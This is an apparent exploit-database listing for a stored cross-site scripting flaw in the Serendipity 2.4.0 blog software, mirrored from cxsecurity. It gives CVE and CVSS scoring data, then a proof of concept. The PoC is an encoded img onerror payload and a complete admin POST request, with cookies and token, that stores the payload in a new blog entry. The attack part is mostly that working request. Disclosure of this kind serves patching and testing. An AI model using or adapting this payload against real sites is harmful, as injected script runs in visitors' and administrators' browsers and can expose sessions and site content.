Advertisement






Serendipity 2.4.0 Cross Site Scripting

CVE Category Price Severity
CVE-2020-35573 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2023-04-21
CPE
cpe:cpe:/a:serendipity:serendipity:2.4.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.87652 0.99932

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040067

Below is a copy:

Serendipity 2.4.0 Cross Site Scripting
Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Author: Mirabbas Aalarov
Application: Serendipity
Version: 2.4.0
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1.Anyone who has the authority to create the new entry can do this
payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E


POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: localhost
Content-Length: 730
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1



2. visit the entry you created

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum